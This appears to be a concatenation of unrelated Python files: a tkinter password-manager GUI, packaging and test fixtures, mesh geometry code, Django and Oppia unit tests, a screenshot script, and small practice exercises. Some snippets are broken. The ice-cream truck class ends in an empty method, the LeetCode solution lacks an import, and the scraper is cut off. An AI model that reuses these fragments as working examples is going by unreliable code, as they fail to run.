self.tags_option_menu.grid(row=1, column=1)
search_btn = Button(text='Search', bg=BACKGROUND_COLOUR, fg=FOREGROUND_COLOUR, pady=10,
command=self.list_passwords_clicked)
search_btn.grid(row=1, column=3)
add_btn = Button(text='Add a new entry', bg=BACKGROUND_COLOUR, fg=FOREGROUND_COLOUR, pady=10,
command=self.add_new_password_clicked)
add_btn.grid(row=2, column=0)
gen_pass_btn = Button(text='Generate Password', bg=BACKGROUND_COLOUR, fg=FOREGROUND_COLOUR, pady=10,
command=self.generate_password_clicked)
gen_pass_btn.grid(row=2, column=1)
def list_passwords_clicked(self):
self.create_list_pass_window(master=self.main_window)
def create_list_pass_window(self, master):
list_pass_window = Toplevel(master=master)
tag_choice = str(self.select_tag.get()).lower()
list_pass_window.title(f'List of passwords for {tag_choice}')
list_pass_window.config(padx=50, pady=50, bg=BACKGROUND_COLOUR)
intruct_label = Label(master=list_pass_window, text='Click on item to copy', bg=BACKGROUND_COLOUR,
fg=FOREGROUND_COLOUR, pady=10)
intruct_label.grid(row=0, column=0)
count, user_list, pass_list = self.data_manager_obj.get_all_passwords(tag_choice)
self.user_listbox = Listbox(master=list_pass_window, height=count)
for i in range(count):
self.user_listbox.insert(i, user_list[i])
self.user_listbox.grid(row=1, column=0)
self.pass_listbox = Listbox(master=list_pass_window, height=count)
for i in range(count):
self.pass_listbox.insert(i, pass_list[i])
self.pass_listbox.grid(row=1, column=1)
self.user_listbox.bind("<<ListboxSelect>>", self.user_listbox_used)
self.pass_listbox.bind("<<ListboxSelect>>", self.pass_listbox_used)
def user_listbox_used(self, event):
if self.user_listbox.curselection():
pyperclip.copy(self.user_listbox.get(self.user_listbox.curselection()))
messagebox.showinfo(title='Copied',
message='Copied this item!')
def pass_listbox_used(self, event):
if self.pass_listbox.curselection():
pyperclip.copy(self.pass_listbox.get(self.pass_listbox.curselection()))
messagebox.showinfo(title='Copied',
message='Copied this item!')
def generate_password_clicked(self):
self.create_gen_pass_window(master=self.main_window)
def create_gen_pass_window(self, master):
generate_pass_window = Toplevel(master=master)
generate_pass_window.title('Generate a new password')
generate_pass_window.config(padx=50, pady=50, bg=BACKGROUND_COLOUR)
self.symbols_checked = IntVar()
self.letters_checked = IntVar()
self.numbers_checked = IntVar()
symbols_check = Checkbutton(master=generate_pass_window, text='Symbols', variable=self.symbols_checked, pady=10)
symbols_check.config(bg=BACKGROUND_COLOUR, highlightthickness=0)
symbols_check.grid(row=0, column=0)
letters_check = Checkbutton(master=generate_pass_window, text='Letters', variable=self.letters_checked, pady=10)
letters_check.config(bg=BACKGROUND_COLOUR, highlightthickness=0)
letters_check.grid(row=1, column=0)
numbers_check = Checkbutton(master=generate_pass_window, text='Numbers', variable=self.numbers_checked, pady=10)
numbers_check.config(bg=BACKGROUND_COLOUR, highlightthickness=0)
numbers_check.grid(row=2, column=0)
self.spinbox_pass_length = Spinbox(master=generate_pass_window, from_=8, to=128, width=5)
self.spinbox_pass_length.grid(row=3, column=0)
go_btn = Button(master=generate_pass_window, text='Go', bg=BACKGROUND_COLOUR, fg=FOREGROUND_COLOUR,
command=self.generate_password, pady=10)
go_btn.grid(row=4, column=1)
def generate_password(self):
symbols = self.symbols_checked.get()
letters = self.letters_checked.get()
numbers = self.numbers_checked.get()
pass_length = self.spinbox_pass_length.get()
password = password_generator.generate_password(has_symbols=bool(symbols),
has_letters=bool(letters),
has_numbers=bool(numbers),
pass_length=int(pass_length))
messagebox.showinfo(title='Password Generated!',
message=f'Password is copied to clipboard! \nYour password is: {password}')
def add_new_password_clicked(self):
self.create_add_new_password_window(master=self.main_window)
def create_add_new_password_window(self, master):
add_new_pass_window = Toplevel(master=master)
add_new_pass_window.title('Add a new password entry')
add_new_pass_window.config(padx=50, pady=50, bg=BACKGROUND_COLOUR)
tag_label = Label(master=add_new_pass_window, text='TAG: ', bg=BACKGROUND_COLOUR, fg=FOREGROUND_COLOUR, pady=20)
tag_label.grid(row=0, column=0)
self.add_new_tag = StringVar()
tag_entry = Entry(master=add_new_pass_window, width=30, textvariable=self.add_new_tag)
tag_entry.grid(row=0, column=1)
user_label = Label(master=add_new_pass_window, text='USERNAME: ', bg=BACKGROUND_COLOUR, fg=FOREGROUND_COLOUR,
pady=20)
user_label.grid(row=1, column=0)
self.add_new_username = StringVar()
user_entry = Entry(master=add_new_pass_window, width=30, textvariable=self.add_new_username)
user_entry.grid(row=1, column=1)
pass_label = Label(master=add_new_pass_window, text='PASSWORD: ', bg=BACKGROUND_COLOUR, fg=FOREGROUND_COLOUR,
pady=20)
pass_label.grid(row=2, column=0)
self.add_new_pass = StringVar()
pass_entry = Entry(master=add_new_pass_window, width=30, textvariable=self.add_new_pass)
pass_entry.grid(row=2, column=1)
add_pass_btn = Button(master=add_new_pass_window, text='Add this password', bg=BACKGROUND_COLOUR,
fg=FOREGROUND_COLOUR, pady=10, command=self.password_add_clicked)
add_pass_btn.grid(row=3, column=1)
def password_add_clicked(self):
tag_value = str(self.add_new_tag.get())
user_value = str(self.add_new_username.get())
pass_value = str(self.add_new_pass.get())
if tag_value and user_value and pass_value:
tag_value = tag_value.lower()
is_okay = messagebox.askokcancel(title='Confirm save?',
message=f'Are you sure you want to proceed with this info?\n' +
f'Tag: {tag_value}\n' +
f'Username: {user_value}\n' +
f'Password: {pass_value}')
if is_okay:
self.data_manager_obj.add_new_password(tag=tag_value, user=user_value, password=pass_value)
messagebox.showinfo(title='Success!',
message='The save operation was successful!')
# Refresh tags list in the main app screen
self.tags_option_menu['menu'].delete(0, "end")
for string in self.data_manager_obj.get_saved_password_tags():
self.tags_option_menu['menu'].add_command(label=string,
command=lambda value=string: self.select_tag.set(value))
self.add_new_tag.set('')
self.add_new_username.set('')
self.add_new_pass.set('')
else:
self.add_new_tag.set('')
self.add_new_username.set('')
self.add_new_pass.set('')
|
py | 1a49fec113adcfc587f9911de0206ae0cef78c47 | """
Setup script for libanac
"""
import sys
from setuptools import setup
import libanac
install_requires = [
'beautifulsoup4',
'requests',
]
if sys.version_info[:2] < (2, 7):
install_requires.append('argparse')
setup(
name=libanac.__title__,
description=libanac.__summary__,
long_description=open('README.rst').read(),
url=libanac.__url__,
author=libanac.__author__,
author_email=libanac.__email__,
license=libanac.__license__,
version=libanac.__version__,
packages=['libanac'],
test_suite='tests',
platforms='any',
keywords=['ANAC', 'SACI', 'CIV Digital'],
classifiers=[
'Natural Language :: English',
'Operating System :: MacOS :: MacOS X',
'Operating System :: POSIX',
'Operating System :: POSIX :: BSD',
'Operating System :: POSIX :: Linux',
'Operating System :: Microsoft :: Windows',
'Programming Language :: Python',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.6',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: Implementation :: CPython',
],
install_requires=install_requires,
)
|
py | 1a49fee823ddf65671bea3a5b936f38b52ac7c49 | # Copyright 2022 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import annotations
from textwrap import dedent
from pants.backend.helm.util_rules.chart_metadata import DEFAULT_API_VERSION, ChartType
def gen_chart_file(
name: str,
*,
version: str,
description: str | None = None,
type: ChartType = ChartType.APPLICATION,
api_version: str = DEFAULT_API_VERSION,
icon: str | None = None,
) -> str:
metadata_yaml = dedent(
f"""\
apiVersion: {api_version}
name: {name}
version: {version}
type: {type.value}
"""
)
if description:
metadata_yaml += f"description: {description}\n"
if icon:
metadata_yaml += f"icon: {icon}\n"
return metadata_yaml
HELM_CHART_FILE = gen_chart_file("mychart", version="0.1.0")
HELM_CHART_WITH_DEPENDENCIES_FILE = dedent(
"""\
apiVersion: v2
name: mychart
description: A Helm chart for Kubernetes
version: 0.1.0
icon: https://www.example.com/icon.png
dependencies:
- name: other_chart
repository: "@myrepo"
version: "~0.1.0"
alias: dependency_alias
"""
)
HELM_CHART_FILE_V1_FULL = dedent(
"""\
name: foo
version: 0.1.0
kubeVersion: 1.17
description: The foo chart
keywords:
- foo
- chart
home: https://example.com
sources:
- https://example.com/git
dependencies:
- name: bar
version: 0.2.0
repository: https://example.com/repo
condition: bar.enabled
tags:
- foo
- bar
import-values:
- data
alias: bar-alias
maintainers:
- name: foo
email: [email protected]
url: https://example.com/foo
icon: https://example.com/icon.png
appVersion: 0.1.0
deprecated: true
annotations:
example: yes
name: foo
"""
)
HELM_CHART_FILE_V2_FULL = dedent(
"""\
apiVersion: v2
name: quxx
version: 0.1.0
kubeVersion: 1.17
description: The foo chart
type: library
keywords:
- foo
- chart
home: https://example.com
sources:
- https://example.com/git
dependencies:
- name: bar
version: 0.2.0
repository: https://example.com/repo
condition: bar.enabled
tags:
- foo
- bar
import-values:
- data
alias: bar-alias
maintainers:
- name: foo
email: [email protected]
url: https://example.com/foo
icon: https://example.com/icon.png
appVersion: 0.1.0
deprecated: true
annotations:
example: yes
name: quxx
"""
)
K8S_SERVICE_FILE = dedent(
"""\
apiVersion: v1
kind: Service
metadata:
name: {{ template "fullname" . }}
labels:
chart: "{{ .Chart.Name }}-{{ .Chart.Version | replace "+" "_" }}"
spec:
type: {{ .Values.service.type }}
ports:
- port: {{ .Values.service.externalPort }}
targetPort: {{ .Values.service.internalPort }}
protocol: TCP
name: {{ .Values.service.name }}
selector:
app: {{ template "fullname" . }}
"""
)
K8S_INGRESS_FILE_WITH_LINT_WARNINGS = dedent(
"""\
apiVersion: extensions/v1beta1
kind: Ingress
metadata:
name: {{ template "fullname" . }}
labels:
chart: "{{ .Chart.Name }}-{{ .Chart.Version | replace "+" "_" }}"
spec:
rules:
- host: example.com
http:
paths:
- path: /
pathType: Prefix
backend:
service:
name: {{ template "fullname" . }}
port:
name: http
"""
)
K8S_POD_FILE = dedent(
"""\
apiVersion: v1
kind: Pod
metadata:
name: {{ template "fullname" . }}
labels:
chart: "{{ .Chart.Name }}-{{ .Chart.Version | replace "+" "_" }}"
spec:
containers:
- name: myapp-container
image: busybox:1.28
initContainers:
- name: init-service
image: busybox:1.29
"""
)
K8S_CRD_FILE = dedent(
"""\
apiVersion: apiextensions.k8s.io/v1
kind: CustomResourceDefinition
metadata:
# name must match the spec fields below, and be in the form: <plural>.<group>
name: myplatforms.contoso.com
spec:
# group name to use for REST API: /apis/<group>/<version>
group: contoso.com
names:
# plural name to be used in the URL: /apis/<group>/<version>/<plural>
plural: myplatforms
# singular name to be used as an alias on the CLI and for display
singular: myplatform
# kind is normally the CamelCased singular type. Your resource manifests use this.
kind: MyPlatform
# shortNames allow shorter string to match your resource on the CLI
shortNames:
- myp
# either Namespaced or Cluster
scope: Namespaced
versions:
- name: v1alpha1
# Each version can be enabled/disabled by Served flag.
served: true
# One and only one version must be marked as the storage version.
storage: true
schema:
openAPIV3Schema:
type: object
properties:
spec:
type: object
properties:
appId:
type: string
language:
type: string
enum:
- csharp
- python
- go
os:
type: string
enum:
- windows
- linux
instanceSize:
type: string
enum:
- small
- medium
- large
environmentType:
type: string
enum:
- dev
- test
- prod
replicas:
type: integer
minimum: 1
required: ["appId", "language", "environmentType"]
required: ["spec"]
"""
)
HELM_TEMPLATE_HELPERS_FILE = dedent(
"""\
{{- define "fullname" -}}
{{- if .Values.fullnameOverride }}
{{- .Values.fullnameOverride | trunc 63 | trimSuffix "-" }}
{{- else }}
{{- $name := default .Chart.Name .Values.nameOverride }}
{{- if contains $name .Release.Name }}
{{- .Release.Name | trunc 63 | trimSuffix "-" }}
{{- else }}
{{- printf "%s-%s" .Release.Name $name | trunc 63 | trimSuffix "-" }}
{{- end }}
{{- end }}
{{- end }}
"""
)
HELM_VALUES_FILE = dedent(
"""\
service:
name: test
type: ClusterIP
externalPort: 80
internalPort: 1223
"""
)
|
py | 1a49ff20557ebbf65340bfac316b608f6849bab4 | import numpy as np
from .triangle_hash import TriangleHash as _TriangleHash
def check_mesh_contains(mesh, points, hash_resolution=512):
intersector = MeshIntersector(mesh, hash_resolution)
contains = intersector.query(points)
return contains
class MeshIntersector:
def __init__(self, mesh, resolution=512):
triangles = mesh.vertices[mesh.faces].astype(np.float64)
n_tri = triangles.shape[0]
self.resolution = resolution
self.bbox_min = triangles.reshape(3 * n_tri, 3).min(axis=0)
self.bbox_max = triangles.reshape(3 * n_tri, 3).max(axis=0)
# Tranlate and scale it to [0.5, self.resolution - 0.5]^3
self.scale = (resolution - 1) / (self.bbox_max - self.bbox_min)
self.translate = 0.5 - self.scale * self.bbox_min
self._triangles = triangles = self.rescale(triangles)
# assert(np.allclose(triangles.reshape(-1, 3).min(0), 0.5))
# assert(np.allclose(triangles.reshape(-1, 3).max(0), resolution - 0.5))
triangles2d = triangles[:, :, :2]
self._tri_intersector2d = TriangleIntersector2d(
triangles2d, resolution)
def query(self, points):
# Rescale points
points = self.rescale(points)
# placeholder result with no hits we'll fill in later
contains = np.zeros(len(points), dtype=np.bool)
# cull points outside of the axis aligned bounding box
# this avoids running ray tests unless points are close
inside_aabb = np.all((0 <= points) & (points <= self.resolution), axis=1)
if not inside_aabb.any():
return contains
# Only consider points inside bounding box
mask = inside_aabb
points = points[mask]
# Compute intersection depth and check order
points_indices, tri_indices = self._tri_intersector2d.query(points[:, :2])
triangles_intersect = self._triangles[tri_indices]
points_intersect = points[points_indices]
depth_intersect, abs_n_2 = self.compute_intersection_depth(points_intersect, triangles_intersect)
# Count number of intersections in both directions
smaller_depth = depth_intersect >= points_intersect[:, 2] * abs_n_2
bigger_depth = depth_intersect < points_intersect[:, 2] * abs_n_2
points_indices_0 = points_indices[smaller_depth]
points_indices_1 = points_indices[bigger_depth]
nintersect0 = np.bincount(points_indices_0, minlength=points.shape[0])
nintersect1 = np.bincount(points_indices_1, minlength=points.shape[0])
# Check if point contained in mesh
contains1 = (np.mod(nintersect0, 2) == 1)
contains2 = (np.mod(nintersect1, 2) == 1)
if (contains1 != contains2).any():
print('Warning: contains1 != contains2 for some points.')
contains[mask] = (contains1 & contains2)
return contains
def compute_intersection_depth(self, points, triangles):
t1 = triangles[:, 0, :]
t2 = triangles[:, 1, :]
t3 = triangles[:, 2, :]
v1 = t3 - t1
v2 = t2 - t1
# v1 = v1 / np.linalg.norm(v1, axis=-1, keepdims=True)
# v2 = v2 / np.linalg.norm(v2, axis=-1, keepdims=True)
normals = np.cross(v1, v2)
alpha = np.sum(normals[:, :2] * (t1[:, :2] - points[:, :2]), axis=1)
n_2 = normals[:, 2]
t1_2 = t1[:, 2]
s_n_2 = np.sign(n_2)
abs_n_2 = np.abs(n_2)
mask = (abs_n_2 != 0)
depth_intersect = np.full(points.shape[0], np.nan)
depth_intersect[mask] = \
t1_2[mask] * abs_n_2[mask] + alpha[mask] * s_n_2[mask]
# Test the depth:
# TODO: remove and put into tests
# points_new = np.concatenate([points[:, :2], depth_intersect[:, None]], axis=1)
# alpha = (normals * t1).sum(-1)
# mask = (depth_intersect == depth_intersect)
# assert(np.allclose((points_new[mask] * normals[mask]).sum(-1),
# alpha[mask]))
return depth_intersect, abs_n_2
def rescale(self, array):
array = self.scale * array + self.translate
return array
class TriangleIntersector2d:
def __init__(self, triangles, resolution=128):
self.triangles = triangles
self.tri_hash = _TriangleHash(triangles, resolution)
def query(self, points):
point_indices, tri_indices = self.tri_hash.query(points)
point_indices = np.array(point_indices, dtype=np.int64)
tri_indices = np.array(tri_indices, dtype=np.int64)
points = points[point_indices]
triangles = self.triangles[tri_indices]
mask = self.check_triangles(points, triangles)
point_indices = point_indices[mask]
tri_indices = tri_indices[mask]
return point_indices, tri_indices
def check_triangles(self, points, triangles):
contains = np.zeros(points.shape[0], dtype=np.bool)
A = triangles[:, :2] - triangles[:, 2:]
A = A.transpose([0, 2, 1])
y = points - triangles[:, 2]
detA = A[:, 0, 0] * A[:, 1, 1] - A[:, 0, 1] * A[:, 1, 0]
mask = (np.abs(detA) != 0.)
A = A[mask]
y = y[mask]
detA = detA[mask]
s_detA = np.sign(detA)
abs_detA = np.abs(detA)
u = (A[:, 1, 1] * y[:, 0] - A[:, 0, 1] * y[:, 1]) * s_detA
v = (-A[:, 1, 0] * y[:, 0] + A[:, 0, 0] * y[:, 1]) * s_detA
sum_uv = u + v
contains[mask] = (
(0 < u) & (u < abs_detA) & (0 < v) & (v < abs_detA)
& (0 < sum_uv) & (sum_uv < abs_detA)
)
return contains
|
py | 1a4a00a2dc4cfd9dd807ddda07cf2baa97567939 | # coding: utf-8
#
# Copyright 2021 The Oppia Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Unit tests for core.domain.beam_job_domain."""
from __future__ import absolute_import
from __future__ import unicode_literals
import datetime
from core.domain import beam_job_domain
from core.platform import models
from core.tests import test_utils
from jobs.batch_jobs import validation_jobs
import utils
(beam_job_models,) = models.Registry.import_models([models.NAMES.beam_job])
class BeamJobTests(test_utils.TestBase):
NOW = datetime.datetime.utcnow()
def test_usage(self):
job = beam_job_domain.BeamJob(validation_jobs.AuditAllStorageModelsJob)
self.assertEqual(job.name, 'AuditAllStorageModelsJob')
def test_in_terminal_state(self):
cancelled_beam_job_run = beam_job_domain.BeamJobRun(
'123', 'FooJob', beam_job_models.BeamJobState.CANCELLED.value,
self.NOW, self.NOW, True)
drained_beam_job_run = beam_job_domain.BeamJobRun(
'123', 'FooJob', beam_job_models.BeamJobState.DRAINED.value,
self.NOW, self.NOW, True)
updated_beam_job_run = beam_job_domain.BeamJobRun(
'123', 'FooJob', beam_job_models.BeamJobState.UPDATED.value,
self.NOW, self.NOW, True)
done_beam_job_run = beam_job_domain.BeamJobRun(
'123', 'FooJob', beam_job_models.BeamJobState.DONE.value,
self.NOW, self.NOW, True)
failed_beam_job_run = beam_job_domain.BeamJobRun(
'123', 'FooJob', beam_job_models.BeamJobState.FAILED.value,
self.NOW, self.NOW, True)
cancelling_beam_job_run = beam_job_domain.BeamJobRun(
'123', 'FooJob', beam_job_models.BeamJobState.CANCELLING.value,
self.NOW, self.NOW, True)
draining_beam_job_run = beam_job_domain.BeamJobRun(
'123', 'FooJob', beam_job_models.BeamJobState.DRAINING.value,
self.NOW, self.NOW, True)
pending_beam_job_run = beam_job_domain.BeamJobRun(
'123', 'FooJob', beam_job_models.BeamJobState.PENDING.value,
self.NOW, self.NOW, True)
running_beam_job_run = beam_job_domain.BeamJobRun(
'123', 'FooJob', beam_job_models.BeamJobState.RUNNING.value,
self.NOW, self.NOW, True)
stopped_beam_job_run = beam_job_domain.BeamJobRun(
'123', 'FooJob', beam_job_models.BeamJobState.STOPPED.value,
self.NOW, self.NOW, True)
unknown_beam_job_run = beam_job_domain.BeamJobRun(
'123', 'FooJob', beam_job_models.BeamJobState.UNKNOWN.value,
self.NOW, self.NOW, True)
self.assertTrue(cancelled_beam_job_run.in_terminal_state)
self.assertTrue(drained_beam_job_run.in_terminal_state)
self.assertTrue(updated_beam_job_run.in_terminal_state)
self.assertTrue(done_beam_job_run.in_terminal_state)
self.assertTrue(failed_beam_job_run.in_terminal_state)
self.assertFalse(cancelling_beam_job_run.in_terminal_state)
self.assertFalse(draining_beam_job_run.in_terminal_state)
self.assertFalse(pending_beam_job_run.in_terminal_state)
self.assertFalse(running_beam_job_run.in_terminal_state)
self.assertFalse(stopped_beam_job_run.in_terminal_state)
self.assertFalse(unknown_beam_job_run.in_terminal_state)
def test_to_dict(self):
job = beam_job_domain.BeamJob(validation_jobs.AuditAllStorageModelsJob)
self.assertEqual(job.to_dict(), {'name': 'AuditAllStorageModelsJob'})
class BeamJobRunTests(test_utils.TestBase):
NOW = datetime.datetime.utcnow()
def test_usage(self):
run = beam_job_domain.BeamJobRun(
'123', 'FooJob', 'RUNNING', self.NOW, self.NOW, True)
self.assertEqual(run.job_id, '123')
self.assertEqual(run.job_name, 'FooJob')
self.assertEqual(run.job_state, 'RUNNING')
self.assertEqual(run.job_started_on, self.NOW)
self.assertEqual(run.job_updated_on, self.NOW)
self.assertTrue(run.job_is_synchronous)
def test_to_dict(self):
run = beam_job_domain.BeamJobRun(
'123', 'FooJob', 'RUNNING', self.NOW, self.NOW, True)
self.assertEqual(run.to_dict(), {
'job_id': '123',
'job_name': 'FooJob',
'job_state': 'RUNNING',
'job_started_on_msecs': utils.get_time_in_millisecs(self.NOW),
'job_updated_on_msecs': utils.get_time_in_millisecs(self.NOW),
'job_is_synchronous': True,
})
class AggregateBeamJobRunResultTests(test_utils.TestBase):
def test_usage(self):
result = beam_job_domain.AggregateBeamJobRunResult('abc', '123')
self.assertEqual(result.stdout, 'abc')
self.assertEqual(result.stderr, '123')
def test_to_dict(self):
result = beam_job_domain.AggregateBeamJobRunResult('abc', '123')
self.assertEqual(result.to_dict(), {
'stdout': 'abc',
'stderr': '123',
})
|
py | 1a4a014ab08777eec4aa70f7d70d5d9c9af24649 | #File with 2 function to take an screenshot in linux
import gi
gi.require_version('Gdk', '3.0')
from gi.repository import Gdk
from Xlib import display, X
from PIL import Image
#PIL
#Try to integrate with PIL to return an PIL Image
def screenShot1():
# full screenshot
window = Gdk.get_default_root_window()
pb = Gdk.pixbuf_get_from_window(window, *window.get_geometry())
pb.savev("full.png", "png", (), ())
# # screenshots for all windows
# window = Gdk.get_default_root_window()
# screen = window.get_screen()
# typ = window.get_type_hint()
# for i, w in enumerate(screen.get_window_stack()):
# pb = Gdk.pixbuf_get_from_window(w, *w.get_geometry())
# pb.savev("{}.png".format(i), "png", (), ())
# # screenshot active window
# screen = Gdk.get_default_root_window().get_screen()
# w = screen.get_active_window()
# pb = Gdk.pixbuf_get_from_window(w, *w.get_geometry())
# pb.savev("active.png", "png", (), ())
#Works with PIL, but too slow
def screenShot2():
dsp = display.Display()
root = dsp.screen().root
w = root.get_geometry().width
h = root.get_geometry().height
print(dsp.get_display_name(), w, h)
raw = root.get_image(0, 0, w, h, X.ZPixmap, 0xffffffff)
image = Image.frombytes("RGB", (w, h), raw.data, "raw", "BGRX")
# image.show()
# image.save("teste.png")
return image
def performanceTest():
import time
counter=10
while counter:
print(time.perf_counter(), counter)
screenShot2()
counter -=1
# screenShot2()
performanceTest()
|
py | 1a4a01904f00a27ca32c8210239932c0acd7f548 | import logging
from django.contrib.admin.helpers import ACTION_CHECKBOX_NAME
from django.contrib.auth.models import User
from django.test.client import Client
from django.test.testcases import TestCase
from metashare import test_utils
from metashare.accounts.models import EditorGroup, EditorGroupManagers
from metashare.repository.models import resourceInfoType_model
from metashare.settings import DJANGO_BASE, ROOT_PATH, LOG_HANDLER
from metashare.storage.models import PUBLISHED, INGESTED, INTERNAL, REMOTE
# Setup logging support.
LOGGER = logging.getLogger(__name__)
LOGGER.addHandler(LOG_HANDLER)
ADMINROOT = '/{0}editor/repository/resourceinfotype_model/'.format(DJANGO_BASE)
class StatusWorkflowTest(TestCase):
resource_id = None
@classmethod
def setUpClass(cls):
"""
Import a resource to test the workflow changes for
"""
LOGGER.info("running '{}' tests...".format(cls.__name__))
test_utils.set_index_active(False)
test_utils.setup_test_storage()
_test_editor_group = \
EditorGroup.objects.create(name='test_editor_group')
_test_manager_group = \
EditorGroupManagers.objects.create(name='test_manager_group',
managed_group=_test_editor_group)
test_utils.create_manager_user(
'manageruser', '[email protected]', 'secret',
(_test_editor_group, _test_manager_group))
_fixture = '{0}/repository/fixtures/testfixture.xml'.format(ROOT_PATH)
_result = test_utils.import_xml(_fixture)
_result.editor_groups.add(_test_editor_group)
StatusWorkflowTest.resource_id = _result.id
@classmethod
def tearDownClass(cls):
"""
Clean up the test
"""
test_utils.clean_resources_db()
test_utils.clean_storage()
test_utils.clean_user_db()
test_utils.set_index_active(True)
LOGGER.info("finished '{}' tests".format(cls.__name__))
def test_can_publish_ingested(self):
client = Client()
client.login(username='manageruser', password='secret')
resource = resourceInfoType_model.objects.get(pk=self.resource_id)
resource.storage_object.publication_status = INGESTED
resource.storage_object.save()
client.post(ADMINROOT,
{"action": "publish_action", ACTION_CHECKBOX_NAME: resource.id},
follow=True)
# fetch the resource from DB as our object is not up-to-date anymore
resource = resourceInfoType_model.objects.get(pk=self.resource_id)
self.assertEquals('published', resource.publication_status())
def test_cannot_publish_internal(self):
client = Client()
client.login(username='manageruser', password='secret')
resource = resourceInfoType_model.objects.get(pk=self.resource_id)
resource.storage_object.publication_status = INTERNAL
resource.storage_object.save()
client.post(ADMINROOT,
{"action": "publish_action", ACTION_CHECKBOX_NAME: resource.id},
follow=True)
# fetch the resource from DB as our object is not up-to-date anymore
resource = resourceInfoType_model.objects.get(pk=self.resource_id)
self.assertEquals('internal', resource.publication_status())
def test_can_ingest_internal(self):
client = Client()
client.login(username='manageruser', password='secret')
resource = resourceInfoType_model.objects.get(pk=self.resource_id)
resource.storage_object.publication_status = INTERNAL
resource.storage_object.save()
client.post(ADMINROOT,
{"action": "ingest_action", ACTION_CHECKBOX_NAME: resource.id},
follow=True)
# fetch the resource from DB as our object is not up-to-date anymore
resource = resourceInfoType_model.objects.get(pk=self.resource_id)
self.assertEquals('ingested', resource.publication_status())
def test_cannot_ingest_published(self):
client = Client()
client.login(username='manageruser', password='secret')
resource = resourceInfoType_model.objects.get(pk=self.resource_id)
resource.storage_object.publication_status = PUBLISHED
resource.storage_object.save()
client.post(ADMINROOT,
{"action": "ingest_action", ACTION_CHECKBOX_NAME: resource.id},
follow=True)
# fetch the resource from DB as our object is not up-to-date anymore
resource = resourceInfoType_model.objects.get(pk=self.resource_id)
self.assertEquals('published', resource.publication_status())
def test_can_unpublish_published(self):
client = Client()
client.login(username='manageruser', password='secret')
resource = resourceInfoType_model.objects.get(pk=self.resource_id)
resource.storage_object.publication_status = PUBLISHED
resource.storage_object.save()
client.post(ADMINROOT,
{"action": "unpublish_action", ACTION_CHECKBOX_NAME: resource.id},
follow=True)
# fetch the resource from DB as our object is not up-to-date anymore
resource = resourceInfoType_model.objects.get(pk=self.resource_id)
self.assertEquals('ingested', resource.publication_status())
def test_cannot_unpublish_internal(self):
client = Client()
client.login(username='manageruser', password='secret')
resource = resourceInfoType_model.objects.get(pk=self.resource_id)
resource.storage_object.publication_status = INTERNAL
resource.storage_object.save()
client.post(ADMINROOT,
{"action": "unpublish_action", ACTION_CHECKBOX_NAME: resource.id},
follow=True)
# fetch the resource from DB as our object is not up-to-date anymore
resource = resourceInfoType_model.objects.get(pk=self.resource_id)
self.assertEquals('internal', resource.publication_status())
def test_cannot_change_publication_status_of_remote_copies(self):
# not even a superuser must change the publication status of a remote
# resource copy
superuser = User.objects.create_superuser(
"superuser", "[email protected]", "secret")
client = Client()
client.login(username=superuser.username, password='secret')
# import a temporary resource to not mess with the other tests and set
# the copy status to remote
resource = test_utils.import_xml(
'{0}/repository/fixtures/ILSP10.xml'.format(ROOT_PATH))
resource.storage_object.copy_status = REMOTE
# (1) verify that a status change from published is not possible:
resource.storage_object.publication_status = PUBLISHED
resource.storage_object.save()
client.post(ADMINROOT,
{"action": "unpublish_action", ACTION_CHECKBOX_NAME: resource.id},
follow=True)
# fetch the resource from DB as our object is not up-to-date anymore
resource = resourceInfoType_model.objects.get(pk=resource.id)
self.assertEquals('published', resource.publication_status())
# (2) verify that a status change from ingested is not possible:
resource.storage_object.publication_status = INGESTED
resource.storage_object.save()
client.post(ADMINROOT,
{"action": "publish_action", ACTION_CHECKBOX_NAME: resource.id},
follow=True)
# fetch the resource from DB as our object is not up-to-date anymore
resource = resourceInfoType_model.objects.get(pk=resource.id)
self.assertEquals('ingested', resource.publication_status())
|
py | 1a4a032a2e7bfbfaeb46dc90fc586987fe116284 | """[Practice: Deluxe Ice Cream Truck]
child class parent class
class Ice (H2O):
pass
| expression
"""
from sympy import real_root
class Icecream:
max_scoops = 3
def __init__(self):
self.scoops = 0
def eat(self, scoops):
if self.scoops < scoops:
print("Not enough bites left!")
else:
self.scoops -= scoops
def add(self, scoops):
self.scoops += scoops # new - in-place op
if self.scoops > self.max_scoops:
self.scoops = 0
print("Too many scoops! Dropped ice cream.")
class IceCreamTruck:
def order(self, scoops):
self.sold = 0
def order(self, scoops):
ice_cream = Icecream()
self.add(ice_cream, scoops)
return ice_cream
def add(self, ice_cream, scoops):
ice_cream.add(scoops)
self.sold += scoops
class DeluxeIceCreamTruck(IceCreamTruck):
def order(self, scoops):
|
py | 1a4a0381074499fede395e870e7f560e7f3dae29 | class Solution:
def countLargestGroup(self, n: int) -> int:
dp=[0 for i in range(n+1)]
for i in range(1,n+1):
b = i//10
dp[i] = dp[b] + (i%10)
c = Counter(dp[1:])
t = sorted(c.items(),key=lambda x: x[1],reverse=True)
n = t[0][1]
return len([x for x in t if x[1]==n])
"""
def sumdigit(m):
s = 0
while m>0:
s += m%10
m //= 10
return s
d = {}
for i in range(1,n+1):
k = sumdigit(i)
d[k] = d.get(k,0) + 1
v = d.items()
t = sorted(v,key=lambda x: x[1], reverse=True)
n = t[0][1]
return len([x for x in t if x[1]==n])
"""
|
py | 1a4a03f5bb9eed3b2311f18ffe4752c94e05c514 | # Your Code Here
def squared(a):
return a**2
applyToEach(testList, squared)
|
py | 1a4a03fe8d4c4bf2c2c94ab3763643f422c36c5d | from bs4 import BeautifulSoup
import csv
from urllib.request import urlopen
from os.path import exists, join
from os import mkdir
from itertools import groupby
from operator import itemgetter
def read_page(url):
return urlopen(url).read()
def clean_comment(name_with_parenthesis):
return name_with_parenthesis.split("(")[0].strip()
def find_all_streets(html):
soup = BeautifulSoup(html)
titles = soup.find_all("h2")
assert titles[0].text.startswith("Liste"), titles[0].text
assert titles[1].text.startswith("Voir aussi") or \
titles[1].text.startswith("Source") or \
